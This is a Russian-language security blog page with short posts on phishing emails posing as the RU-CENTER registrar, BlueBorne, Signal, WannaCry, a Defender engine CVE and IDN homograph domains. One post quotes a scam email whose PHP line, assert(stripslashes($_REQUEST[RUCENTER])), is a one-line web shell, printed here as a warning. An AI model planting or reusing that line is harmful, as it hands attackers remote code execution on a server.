?

Log in

No account? Create an account
Security (b)log
Журнал (о) безопасности
Recent Entries 
Уважаемые клиенты!

Некоторые наши клиенты периодически получают письма якобы от имени RU-CENTER, призывающие:

разместить в корневой директории сайта вредоносный файл для подтверждения права владения доменом;
произвести оплату услуг по ссылке, ведущей на сайт, не имеющий отношения к RU-CENTER;
оплатить «регистрацию домена в поисковых системах», «присутствие в интернете» и т.д.

Подобные письма рассылаются мошенниками по адресам, находящимся в открытом доступе.

Мы никогда не требуем подтвердить право на домен таким способом, не запрашиваем у клиентов пароли в электронных письмах, не размещаем формы оплаты наших услуг на сторонних ресурсах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов, публикуемые на нашем сайте.
Read more...Collapse )

Уважаемый администратор домена!

В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем ***.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл *****.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего сообщения и находиться на сервере до 19 августа 2017 года, 15:00 (UTC+03:00), в противном случае процедура активации будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

Письмо я прочитал слишком поздно, а то бы и вправду создал этот файл. Естественно, с другим кодом, чтобы записать, какие запросы эти хакеры в него будут посылать, а не позволять им читать и писать файлы у меня на сервере, и выполнять прочие команды.

Read more...Collapse )
под общим названием "BlueBorne", которые позволяют захватить управление устройством и получить доступ к его данным. Причём практически на всех операционных системах: Winodws, Linux, Android, iOS.. Хотя сейчас производители операционок эти дырки затыкают, но на старых системах они остаются.

Информация от компании, которая это обнаружила: https://www.armis.com/blueborne/

Взято с BugTrack.ru
Вроде её уже исправили и в винде, и в линуксе, и во FreeBSD, но она там присутствовала больше 20 лет..
Подробности тут:



Найдено в bugtrack.ru
18th-May-2017 03:41 pm - Сигнал!
Signal - это такой opensource'ный мессенджер (с возможностью аудио- и видеопереговоров) для андроида и iOS, а также на обычных компьютерах в виде плагина для Хрома или Хромиума.

Я раньше про него не слыхал, а теперь он оказался разрешён для использования американскими сенаторами, поскольку он идеален с точки зрения информационной безопасности: хотя он и пользуется серверами компании-разработчика, но шифрует и дешифрует все передаваемые данные непосредственно в клиентской программе, и потому русским хакерам не удастся перехватить их по дороге и даже на сервере: https://lawfareblog.com/step-forward-security

Via Bruce Schneier

Кто-нибудь пробовал им пользоваться?
12th-May-2017 09:31 pm - Wana Decrypt0r 2.0
Новый вирус/ransomware Wana Decrypt0r 2.0 шагает по планете.

Уже заражены российский МВД, Мегафон, 16 госпиталей Британии, испанская Telefonica, китайские университеты, что-то на Тайване. Распространяется, скорее всего, через февральскую дыру в SMBv1. Проверьте вашу винду на апдейты.


Подробности на английском: https://www.bleepingcomputer.com/news/security/wana-decrypt0r-ransomware-using-nsa-exploit-leaked-by-shadow-brokers-is-on-a-rampage/
Подробности на русском: https://geektimes.ru/post/289115/
Патч: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Карта заражений в реальном времени: https://intel.malwaretech.com/WannaCrypt.html
И не просто так, а конкретно в Microsoft Malware Protection Engine..
Подсовывание туда на проверку файла со встроенным специфическим джаваскриптом позволяет запустить любой код, или спровоцировать DoS: CVE-2017-0290
Originally posted by dil at Доигрались с интернационализированными доменами..

Теперь можно зарегистрировать домен, выглядящий точно так же, как чужой, только с буковками из другого алфавита. И даже приделать к нему честно подписанный SSLный сертификат: https://www.аррӏе.com/

Выглядит почти как настоящий, но на самом деле это xn--80ak6aa92e.com, с буквами из кириллицы: “а”, “р”, “е”, и “ӏ” (так называемая, “палочка” , которая используется в некоторых кавказских языках).


Подробности тут.


Как обычно, про эту дырку в безопасности сообщил Брюс Шнайер.

Во всех нынешних версиях. При получении кривого ответа от SMB-сервера Windows может помереть.
Проблема в том, что ссылка на такой вредоносный сервер может быть подсунута в обычную html-страницу или в электронную почту.
Подробности: TheRegister

Выложенный в публичный доступ скрипт на питоне, слушающий на 445 порту, и реализающий эту уязвимость: на github'е.

Источник: bugtraq.ru
This page was loaded Sep 25th 2018, 7:05 am GMT.